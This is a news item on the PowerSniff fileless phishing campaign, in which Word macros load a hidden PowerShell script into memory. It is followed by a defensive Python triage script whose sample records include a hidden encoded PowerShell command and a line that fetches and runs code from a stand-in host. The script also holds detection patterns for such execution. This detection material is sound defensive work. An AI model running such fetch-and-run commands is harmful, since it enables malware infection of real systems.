Fileless Phishing Attack Infects Windows Systems

Malicious macro loads directly to memory and executes a hidden PowerShell instance.

Researchers at Palo Alto Networks have uncovered a Word document phishing scheme that downloads its payload directly to memory. The attack targets Windows systems that have PowerShell, which is almost every recent Windows version.

The so-called PowerSniff attack arrives in an email message that contains unusually detailed information about the recipient, gaining the reader's confidence through knowledge of facts such as the company name, phone number, and address. If the user opens the attached document, the document downloads a hidden script that resides only in memory, leaving no footprint in the filesystem. The hidden script performs a number of reconnaissance checks, including checking whether the system is running in a sandbox, and it probes other computers on the network to determine whether any are used for medical information or financial transactions.

According to the alert posted by Palo Alto’s Josh Grunzweig and Brandon Levene, all users who have PowerShell-ready systems should ensure that macros are not enabled by default and should “be wary of opening any macros received from untrusted sources.”
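A detection-side illustration of the behaviour described above, added here and not part of the article or of Palo Alto's research: it triages process-creation records for the pattern of an Office application spawning PowerShell with window-hiding, encoded-command or download-to-memory switches. The pipe-delimited record format, the sample command lines and the URL are constructed assumptions, not data from the report.

```python
import re
from typing import Dict, List

# Constructed sample records (parent image | child image | command line), in the
# shape a normalised Sysmon Event ID 1 or Windows 4688 feed might provide.
SAMPLE_EVENTS = [
    r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand SQBFAFgA",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -File C:\scripts\inventory.ps1",
    r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')",
    r"C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs",
]

# Office binaries that should rarely, if ever, be the parent of a shell.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Switches that point at invisible, in-memory execution rather than a saved script.
HIDDEN_FLAGS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I), "encoded command"),
    (re.compile(r"downloadstring|invoke-expression|\biex\b", re.I), "download-to-memory / IEX"),
]


def assess(event: str) -> Dict[str, object]:
    """Score one record; Office parent plus a PowerShell command line is the core pattern."""
    parent, _image, cmdline = event.split("|", 2)
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    indicators: List[str] = []
    if parent_name in OFFICE_APPS:
        indicators.append(f"spawned by Office app {parent_name}")
    # Match on the command line, not only the child image, so a hop through cmd.exe is still seen.
    if "powershell" in cmdline.lower():
        indicators.append("PowerShell invocation")
    for pattern, label in HIDDEN_FLAGS:
        if pattern.search(cmdline):
            indicators.append(label)
    suspicious = parent_name in OFFICE_APPS and "PowerShell invocation" in indicators
    return {"parent": parent_name, "suspicious": suspicious, "indicators": indicators}


def triage(events: List[str]) -> List[Dict[str, object]]:
    """Return only the records worth an analyst's attention, with their indicators."""
    return [r for r in (assess(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["parent"], "->", ", ".join(hit["indicators"]))
```

The hidden-window and encoded-command switches are not malicious on their own; the Office parent is what makes the combination worth alerting on, so the rule keys on that first.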

03/16/2016
